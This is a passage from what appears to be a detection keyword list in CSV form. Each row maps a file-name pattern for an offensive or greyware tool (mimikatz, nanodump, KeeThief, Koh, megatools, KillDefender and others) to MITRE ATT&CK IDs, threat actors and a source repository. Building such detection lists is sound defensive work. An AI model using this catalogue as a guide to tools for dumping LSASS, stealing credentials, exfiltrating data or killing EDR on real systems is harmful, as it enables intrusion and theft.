and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - 
Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*\keepass_discover.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\keepass_trigger.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\KeeTheft.exe*","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","0","private github repo","10",,"N/A",,, +"*\kerberoast.c*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*\KernelTokens.sys*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*\keygen.exe*","greyware_tool_keyword","_","generic suspicious keyword keygen.exe observed in multiple cracked software often packed with 
malwares","T1204 - T1027 - T1059 - T1055 - T1060 - T1195","TA0005 - TA0002 - TA0011","N/A","N/A","Phishing","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\Keylogger.txt*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","7","662","118","2023-10-04T15:20:08Z","2022-09-04T10:48:49Z" +"*\KillDefender.c*","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","0","N/A","10","3","200","29","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" +"*\KillDefender.o*","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","0","N/A","10","3","200","29","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" +"*\kitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*\KittyStager*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*\Koh.exe*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" +"*\Koh.pdb*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" +"*\Koh\Koh.*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik 
Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z"
+"*\krb5\*.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*\KRBUACBypass*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z"
+"*\Ladon.exe*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*\Ladon.ps1*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*\lansearch.exe*","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://www.advanced-port-scanner.com/","1","0","N/A","7","10","N/A","N/A","N/A","N/A"
+"*\laps.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\LAPSDumper\*","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential 
Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z"
+"*\ldap_search_bof.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z"
+"*\ldap-checker.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\LibSnaffle*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","0","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z"
+"*\Loader\Loader.csproj*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z"
+"*\local_admins.csv*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*\LocalPrivEsc\*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*\LogonScreen.exe*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z"
+"*\lsass.DMP","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - 
T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z"
+"*\lsass.dmp*","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","1","N/A","10","10","156","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z"
+"*\lsass.dmp*","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z"
+"*\LSASSProtectionBypass\*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - 
TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z"
+"*\LsassSilentProcessExit*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z"
+"*\lsassy_dump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\m3-gen.py*","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","8","5","488","117","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z"
+"*\MaccaroniC2*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","0","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z"
+"*\MachineAccountQuota.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory 
networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\macoffe.pdb*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*\malseclogon.*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z"
+"*\MalStuff.cpp*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z"
+"*\malware_runner.py*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","0","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z"
+"*\manspider_*.log*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z"
+"*\masky.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\master\GPSCoordinates\*","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*\Mayhem.psm1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*\megatools-*-win64\*","greyware_tool_keyword","megatools","Megatools is a collection of free and open source programs for accessing Mega service from a command line. 
Abused by attackers for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/megous/megatools","1","0","N/A","9",,"N/A",,,
+"*\megatools.exe*","greyware_tool_keyword","megatools","Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/megous/megatools","1","0","N/A","9",,"N/A",,,
+"*\mem_dll.pdb*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*\met_inject.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\mhydeath64*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z"
+"*\mimi32.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*\mimi64.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
